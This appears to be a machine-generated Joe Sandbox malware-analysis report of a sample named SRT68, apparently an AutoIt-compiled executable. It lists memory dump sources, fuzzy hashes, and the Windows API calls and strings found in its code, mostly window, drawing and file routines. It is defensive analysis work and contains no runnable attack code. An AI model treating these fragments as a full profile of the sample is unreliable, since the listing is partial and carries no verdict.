                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: c3bc0f5b99e8445609e5172b9cb238679d2f561e2710f2de5d2b205e2b78a296
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: 6E019278A00509EFCB84DF98D5D09AEF7F5FB48310F208599D819AB301D730AE51DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 0101785B
                                                                      • DeleteObject.GDI32(00000000), ref: 0101786D
                                                                      • DestroyWindow.USER32 ref: 0101787B
                                                                      • GetDesktopWindow.USER32 ref: 01017895
                                                                      • GetWindowRect.USER32(00000000), ref: 0101789C
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010179DD
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010179ED
                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A35
                                                                      • GetClientRect.USER32(00000000,?), ref: 01017A41
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01017A7B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A9D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AB0
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017ABB
                                                                      • GlobalLock.KERNEL32(00000000), ref: 01017AC4
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AD3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 01017ADC
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AE3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 01017AEE
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B00
                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01032CAC,00000000), ref: 01017B16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 01017B26
                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01017B4C
                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01017B6B
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B8D
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017D7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                      • Instruction ID: a87312f6c36c32f77fd99472d3a018c78e3475eda366d1fe6951e28d8b0a2ef5
                                                                      • Opcode Fuzzy Hash: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                      • Instruction Fuzzy Hash: B002A27190010AEFDB24DFA8DC89EAE7BB9FF49350F148158F945AB294CB799D01CB60
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,0102F910), ref: 01023627
                                                                      • IsWindowVisible.USER32(?), ref: 0102364B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                      • Instruction ID: 58043a03722bf4dccb7da8e57082d6d3e500b6956aff2dcf8ce744147b3d198a
                                                                      • Opcode Fuzzy Hash: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                      • Instruction Fuzzy Hash: DBD18B70208311CBCB14EF14C956A6EBBE5BF89384F044468F9C65F3A2CB2DE90ADB51
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0102A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0102A661
                                                                      • GetSysColor.USER32(0000000F), ref: 0102A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0102A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 0102A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 0102A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0102A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 0102A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 0102A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0102A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 0102A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102A78E
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(00000012), ref: 0102A903
                                                                        • Part of subcall function 0102A8CA: SetTextColor.GDI32(?,?), ref: 0102A907
                                                                        • Part of subcall function 0102A8CA: GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(0000000F), ref: 0102A928
                                                                        • Part of subcall function 0102A8CA: GetSysColor.USER32(00000011), ref: 0102A945
                                                                        • Part of subcall function 0102A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                        • Part of subcall function 0102A8CA: SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                        • Part of subcall function 0102A8CA: SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                        • Part of subcall function 0102A8CA: SelectObject.GDI32(?,?), ref: 0102A97A
                                                                        • Part of subcall function 0102A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                        • Part of subcall function 0102A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                        • Part of subcall function 0102A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                        • Part of subcall function 0102A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: a506441c1f7f81b4956bd22ea16779c06de61fe6b837a0163f9bf0a7f93dccf3
                                                                      • Instruction ID: 8c737bc2030b5fc58c2dd347ae1175eec8ccb5b7e262790d8215d70b42370d1d
                                                                      • Opcode Fuzzy Hash: a506441c1f7f81b4956bd22ea16779c06de61fe6b837a0163f9bf0a7f93dccf3
                                                                      • Instruction Fuzzy Hash: 45918D72108312EFD7219F64DC08E5B7BF9FF89361F200A19FAA296194DB7AD844CB51
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?), ref: 00FA2CA2
                                                                      • DeleteObject.GDI32(00000000), ref: 00FA2CE8
                                                                      • DeleteObject.GDI32(00000000), ref: 00FA2CF3
                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00FA2CFE
                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00FA2D09
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FDC43B
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FDC474
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FDC89D
                                                                        • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                      • SendMessageW.USER32(?,00001053), ref: 00FDC8DA
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FDC8F1
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC907
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC912
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 464785882-4108050209
                                                                      • Opcode ID: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                      • Instruction ID: a8e471a248838c62af17c2d61602db85342fb17c389d3510f411a0cf66082228
                                                                      • Opcode Fuzzy Hash: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
                                                                      • Instruction Fuzzy Hash: E912A170A04202EFDB25CF28C884BA9B7E6FF05360F58456AF599CB652C735EC41EB91
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 010174DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0101759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010175DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010175ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01017633
                                                                      • GetClientRect.USER32(00000000,?), ref: 0101763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01017683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01017692
                                                                      • GetStockObject.GDI32(00000011), ref: 010176A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 010176A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010176B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010176BF
                                                                      • DeleteDC.GDI32(00000000), ref: 010176C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010176F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0101770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01017746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0101775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0101776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0101779B
                                                                      • GetStockObject.GDI32(00000011), ref: 010177A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010177B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010177BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                      • Instruction ID: 6cb34f0b771f67f848a5c06ba3f605adb01256967813ea12ba58b39c069a1e6f
                                                                      • Opcode Fuzzy Hash: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
                                                                      • Instruction Fuzzy Hash: B6A161B1A40215BFEB24DFA5DC4AFAF7BB9EB05750F104114FA54A72D4C6B9AD00CB60
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,0102FAC0,?,\\.\,0102F910), ref: 0100ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,0102FAC0,?,\\.\,0102F910), ref: 0100AF59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                      • Instruction ID: 864c54e0a49c3975ec1016b066bcf527df8792c2f00ec3966785f876e712cfeb
                                                                      • Opcode Fuzzy Hash: 4d837a12768b77749c54c72c8efe4701bac18815392801a709b10f77f6ae4954
                                                                      • Instruction Fuzzy Hash: 9F51AFF0748305EBAB92EBA6C942DBE77A5EB09600F10805FECC7AB2D1D6719901DB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 43feb6eeac0d837d0e882aae7f3db825f67e02c8c09f21fc34caa6505e8c25cd
                                                                      • Instruction ID: d496460b49ef8662753a36e787541dac6167fe7eba0994cc937c6eeca6c3fba5
                                                                      • Opcode Fuzzy Hash: 43feb6eeac0d837d0e882aae7f3db825f67e02c8c09f21fc34caa6505e8c25cd
                                                                      • Instruction Fuzzy Hash: 668119F1640206AACB11BB21EC43FBF3769AF16750F084029F945EE192EB68DE45F651
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01029AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01029B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 01029BA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                      • Instruction ID: d072f32c2cbe6148e33ed06d392708ad07457dad0e097caf19ac239a2410906a
                                                                      • Opcode Fuzzy Hash: 14b37537234b61af0458856baf26d59e8b9ffda7747466548c110c1ae1c0de21
                                                                      • Instruction Fuzzy Hash: 6502E030104321AFEBA58F28C848FAABFE5FF49358F04455DFAD9962A1C779D844CB91
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0102A903
                                                                      • SetTextColor.GDI32(?,?), ref: 0102A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0102A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 0102A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 0102A92D
                                                                      • GetSysColor.USER32(00000011), ref: 0102A945
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 0102A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0102A96D
                                                                      • SelectObject.GDI32(?,?), ref: 0102A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0102AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0102AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 0102AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 0102AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0102AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0102AA67
                                                                      • SelectObject.GDI32(?,0102A5FA), ref: 0102AA7E
                                                                      • DeleteObject.GDI32(?), ref: 0102AA89
                                                                      • SelectObject.GDI32(?,?), ref: 0102AA8F
                                                                      • DeleteObject.GDI32(?), ref: 0102AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 0102AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 0102AAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 1d0b83b59eedfce69313ea436a00f349cd3849421845e9e1ea621cb95941b3c9
                                                                      • Instruction ID: 508c0c2cb1d96e65a92983cc133951027ff5f25cb16d2b18b99d829abaeb8d82
                                                                      • Opcode Fuzzy Hash: 1d0b83b59eedfce69313ea436a00f349cd3849421845e9e1ea621cb95941b3c9
                                                                      • Instruction Fuzzy Hash: 9E518E71900219FFDB219FA4DC48EAE7BB9FF08360F214255FA51AB295C77A9940CF50
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01028AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028AD2
                                                                      • CharNextW.USER32(0000014E), ref: 01028B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01028B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01028B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01028B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 01028BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01028BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 01028C1F
                                                                      • _memset.LIBCMT ref: 01028C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01028C8D
                                                                      • _memset.LIBCMT ref: 01028CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01028D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 01028D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 01028E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 01028E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028EB4
                                                                      • DrawMenuBar.USER32(?), ref: 01028EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 01028EEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 7bb6186406240c4327a91f94a22f6a7ed72ffbb06da5a88b1cc3589f5bed066e
